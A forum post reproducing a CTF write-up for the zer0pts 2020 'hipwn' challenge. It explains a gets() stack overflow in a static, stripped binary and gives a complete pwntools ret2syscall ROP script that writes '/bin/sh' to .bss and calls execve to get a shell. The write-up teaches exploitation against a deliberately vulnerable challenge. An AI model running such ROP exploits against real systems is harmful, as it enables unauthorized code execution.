学逆向论坛

找回密码
立即注册

只需一步,快速开始

发新帖

275

积分

0

好友

3

主题
发表于 2021-3-5 01:00:35 | 查看: 5633| 回复: 0

相关题目:

♦ hipwn


[zer0pts CTF 2020] hipwn

Author: @ret2basic-PwnieIsland

Topics: ROP (ret2syscall)

Challenge

Hi, all pwners over the world!

chall

main.c

Recon

$ file chall 
chall: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

Note that this binary is statically linked, so we can't use ret2libc. In addition, this binary is stripped, so we know nothing about the function names.

$ checksec chall
  • '/root/Dropbox/Pwnie-Island-Wargame/zer0pts_CTF/Pwn/hipwn/chall'     Arch:     amd64-64-little     RELRO:    Partial RELRO     Stack:    No canary found     NX:       NX enabled     PIE:      No PIE (0x400000)
  • Since NX is the only protection turned on, this challenge can be solved with some ROP technique.

    Source Code

    #include <stdio.h>
    
    int main(void) {
      char name[0x100];
      puts("What's your team name?");
      gets(name);
      printf("Hi, %s. Welcome to zer0pts CTF 2020!\n", name);
      return 0;
    }

    Obviously gets(name); triggers stack overflow that allows us to control EIP.

    Analysis

    Since the binary is statically linked and stripped, the first thing we should try is ret2syscall. To learn more about ret2syscall, check out ret2syscall Cheat Sheet.

    Let's look for necessary ROP gadgets:

    ROPgadget

    However, the string /bin/sh is not inside the binary:

    No "/bin/sh"

    This makes the challenge slightly difficult. What we have to do here is to pass the string "/bin/sh" to the .bss section. The address of .bss can be easily found using Pwntools (bss = elf.bss()). Since the binary contains the function gets, we can call gets(bss) to open a STDIN session and pass the string "/bin/sh" from here.

    Next, we need to find the address of gets. But the binary is stripped, so how do deduce the location of this address? First disassemble the binary:

    $ objdump -D -M intel chall > disassembly.asm

    We know that the SIGSEGV happens at 0x40019c:

    SIGSEGV

    So gets must be happening a few instructions before this point. Search 40019c in the disassembly:

    Disassembly

    There are three functions get called here:

    1. 0x40062f
    2. 0x4004ee
    3. 0x400591

    According to the source code, we can deduce the correspondences based on the order that functions get called:

    1. 0x40062f => puts
    2. 0x4004ee => gets
    3. 0x400591 => printf

    So the address that we are looking for is 0x4004ee.

    Now we have everything ready for the ret2syscall attack.

    Exploit

    #!/usr/bin/env python3
    from pwn import *
    
    #--------setup--------#
    
    context(arch="amd64", os="linux")
    elf = ELF("chall", checksec=False)
    
    local = True
    if local:
        r = elf.process()
    else:
        host = "13.231.207.73"
        port = 9010
        r = remote(host, port)
    
    #--------Addresses--------#
    
    pop_rax = 0x0000000000400121
    pop_rdi = 0x000000000040141c
    pop_rsi_pop_r15 = 0x000000000040141a
    pop_rdx = 0x00000000004023f5
    syscall = 0x00000000004003fc
    
    bss = elf.bss()
    gets = 0x4004ee
    
    #--------ret2syscall--------#
    
    offset = 264
    
    payload = flat(
        b"e" * offset,
        # Round 1: call gets(bss)
        pop_rdi, bss,
        gets,
        # Round 2: call execve("/bin/sh", 0, 0)
        pop_rax, 59,
        pop_rdi, bss,
        pop_rsi_pop_r15, 0, 0x13371337,
        pop_rdx, 0,
        syscall,
    )
    
    r.readuntil("What's your team name?\n")
    r.sendline(payload)
    r.sendline("/bin/sh")
    r.interactive()
    tags: Pwn
    温馨提示:
    1.如果您喜欢这篇帖子,请给作者点赞评分,点赞会增加帖子的热度,评分会给作者加学币。(评分不会扣掉您的积分,系统每天都会重置您的评分额度)。
    2.回复帖子不仅是对作者的认可,还可以获得学币奖励,请尊重他人的劳动成果,拒绝做伸手党!
    3.发广告、灌水回复等违规行为一经发现直接禁言,如果本帖内容涉嫌违规,请点击论坛底部的举报反馈按钮,也可以在【投诉建议】板块发帖举报。

    小黑屋|手机版|站务邮箱|学逆向论坛 ( 粤ICP备2021023307号 )|网站地图

    GMT+8, 2024-11-24 08:23 , Processed in 0.181131 second(s), 35 queries .

    Powered by Discuz! X3.4

    Copyright © 2001-2021, Tencent Cloud.

    快速回复 返回顶部 返回列表